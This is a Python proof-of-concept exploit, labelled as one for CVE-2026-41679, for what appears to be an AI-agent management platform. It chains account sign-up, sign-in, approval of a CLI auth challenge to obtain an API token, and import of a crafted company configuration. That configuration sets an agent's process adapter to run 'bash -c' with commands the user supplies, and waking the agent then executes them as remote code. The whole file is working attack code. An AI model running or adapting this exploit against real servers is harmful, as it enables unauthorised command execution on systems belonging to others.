import argparse import requests import urllib3 urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning) VERIFY = False def signup(target, name, email, password): url = f"{target}/api/auth/sign-up/email" headers = {"Content-Type": "application/json"} data = {"email": email, "password": password, "name": name} resp = requests.post(url, headers=headers, json=data, verify=VERIFY) if resp.status_code != 200 and resp.status_code != 422: raise Exception( f"Couldnot create account, status: {resp.status_code} - {resp.text}." ) def signin(target, email, password): url = f"{target}/api/auth/sign-in/email" headers = {"Content-Type": "application/json"} data = {"email": email, "password": password} resp = requests.post(url, headers=headers, json=data, verify=VERIFY) if "Set-Cookie" not in resp.headers: raise Exception(f"Failed to login, status: {resp.status_code} - {resp.text}.") set_cookie_header_value = resp.headers["Set-Cookie"] session_cookie = set_cookie_header_value.split(";")[0] return session_cookie def create_challenge(target): url = f"{target}/api/cli-auth/challenges" headers = {"Content-Type": "application/json"} data = {"command": "test"} resp = requests.post(url, headers=headers, json=data, verify=VERIFY) response_data = resp.json() if ( "id" not in response_data or "token" not in response_data or "boardApiToken" not in response_data ): raise Exception( f"Couldn't create challenge, status: {resp.status_code} - {resp.text}." ) id = response_data["id"] token = response_data["token"] board_api_token = response_data["boardApiToken"] return id, token, board_api_token def approve_challenge(target, id, token, session_cookie): url = f"{target}/api/cli-auth/challenges/{id}/approve" headers = { "Cookie": session_cookie, "Content-Type": "application/json", "Origin": target, } data = {"token": token} resp = requests.post(url, headers=headers, json=data, verify=VERIFY) response_data = resp.json() #validations... def import_company(target, board_api_token, commands): url = f"{target}/api/companies/import" headers = { "Content-Type": "application/json", "Origin": target, "Authorization": f"Bearer {board_api_token}", } data = { "source": { "type": "inline", "files": { "COMPANY.md": "---\nname: attacker-corp\nslug: attacker-corp\n---\nx", "agents/pwn/AGENTS.md": "---\nkind: agent\nname: pwn\nslug: pwn\nrole: engineer\n---\nx", ".paperclip.yaml": f"agents:\n pwn:\n icon: terminal\n adapter:\n type: process\n config:\n command: bash\n args:\n - -c\n - {commands}" }, }, "target": {"mode": "new_company", "newCompanyName": "attacker-corp"}, "include": {"company": True, "agents": True}, "agents": "all", } resp = requests.post(url, headers=headers, json=data, verify=VERIFY) response_data = resp.json() if "agents" not in response_data or len(response_data["agents"]) < 1: raise Exception( f"No agents created, status: {resp.status_code} - {resp.text}." ) agent = response_data["agents"][0] if "id" not in agent: raise Exception( f"Found agent doesn't have an id, status: {resp.status_code} - {resp.text}." ) return agent["id"] def trigger_agent(target, board_api_token, agent_id): url = f"{target}/api/agents/{agent_id}/wakeup" headers = { "Content-Type": "application/json", "Origin": target, "Authorization": f"Bearer {board_api_token}", } resp = requests.post(url, headers=headers, verify=VERIFY, json={}) response_data = resp.json() if "status" not in response_data or "id" not in response_data: raise Exception( f"Error triggering agent, no id or status returned, status: {resp.status_code} - {resp.text}." ) return response_data["id"], response_data["status"] if __name__ == "__main__": parser = argparse.ArgumentParser(description="This is a POC of CVE-2026-41679.") parser.add_argument( "-t", help="The endpoint of the target to check.", dest="target", required=True ) parser.add_argument("-n", help="The name to use.", dest="name", default="attacker") parser.add_argument( "-e", help="The email-adress to use.", dest="email", default="attacker@evil.com" ) parser.add_argument( "-p", help="The password to use.", dest="password", default="P@sswOrd123!" ) parser.add_argument( "-c", help="The commands to use.", dest="commands", default="id > /tmp/pwned.txt && whoami >> /tmp/pwned.txt" ) args = parser.parse_args() try: signup(args.target, args.name, args.email, args.password) session_cookie = signin(args.target, args.email, args.password) challenge_id, token, board_api_token = create_challenge(args.target) approve_challenge(args.target, challenge_id, token, session_cookie) agent_id = import_company(args.target, board_api_token, args.commands) id, status = trigger_agent(args.target, board_api_token, agent_id) print(f"Vulnerable, was able to trigger RCE with id: {id}.") except Exception as ex: print(str(ex))